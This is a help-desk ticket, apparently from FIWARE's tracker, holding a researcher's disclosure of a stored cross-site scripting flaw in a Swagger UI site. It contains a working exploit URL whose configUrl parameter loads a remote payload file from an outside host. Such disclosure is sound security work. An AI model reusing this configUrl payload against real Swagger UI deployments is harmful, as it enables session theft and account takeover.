Uploaded image for project: 'Help-Desk'
  1. Help-Desk
  2. HELP-21868

[Fiware-tech-help] Bug Report: Swagger UI XSS Vulnerability

        Details

        • Type: extRequest
        • Status: Open
        • Priority: Major
        • Resolution: Unresolved
        • Fix Version/s: None
        • Component/s: FIWARE-TECH-HELP
        • Labels:
          None
        • HD-Chapter:
          Unknown
        • HD-Enabler:
          Unknown
        • HD-Node:
          Unknown

          Description

          Summary:
          Hello team,
          I am a security researcher and I would like to report a security
          vulnerability in the Swagger UI site that allows for Stored cross-site
          scripting (XSS) attacks.
          By accessing the Swagger UI instance through the provided URL, an attacker
          can execute arbitrary JavaScript code and trigger a popup, indicating the
          presence of an XSS vulnerability.
          Severity : High

          Steps to Reproduce:
          1) Open a web browser.
          2) Access the following URL:
          https://swagger.lab.fiware.org/?configUrl=https://xss.smarpo.com/test.json
          3) Once the Swagger UI page loads, observe that an XSS payload is executed
          automatically, resulting in a popup.

          Expected Behavior:
          The Swagger UI instance should sanitize and handle user-supplied input
          securely, preventing the execution of any malicious code.

          Actual Behavior:
          The Swagger UI instance is vulnerable to XSS attacks, allowing for the
          execution of arbitrary JavaScript code. This is evident from the automatic
          execution of a payload that triggers a popup.

          Impact:
          The exploitation of this vulnerability could lead to various security
          risks, including but not limited to:

          • Theft of sensitive information (e.g., cookies, session tokens)
          • Unauthorized actions on behalf of authenticated users
          • Phishing attacks by tricking users into disclosing personal information
          • Defacement of the Swagger UI interface
          • Disruption of service availability

          Read More here :
          https://www.vidocsecurity.com/blog/hacking-swagger-ui-from-xss-to-account-takeovers/

          Recommendation:
          I recommend addressing this XSS vulnerability by implementing proper input
          sanitization and output encoding mechanisms within the Swagger UI codebase.
          Additionally, it is crucial to regularly update and patch Swagger UI with
          the latest security fixes to mitigate potential risks.

          POC: Please find the Screenshot attached below


          Thanks & Regards
          Arjith N R

          __________________________________________________________________________________________

          You can get more information about our cookies and privacy policies on the following links:

          fiware-tech-help mailing list
          fiware-tech-help@lists.fiware.org

          To unsubscribe from fiware-tech-help mailing list, go to the information page of the list at:
          https://lists.fiware.org/listinfo/fiware-tech-help

          [Created via e-mail received from: Arjith <arjithnr@gmail.com>]

            Activity

            There are no comments yet on this issue.

              People

              • Assignee:
                jason.fox Jason Fox
                Reporter:
                fw.ext.user FW External User
              • Votes:
                0 Vote for this issue
                Watchers:
                1 Start watching this issue

                Dates

                • Created:
                  Updated: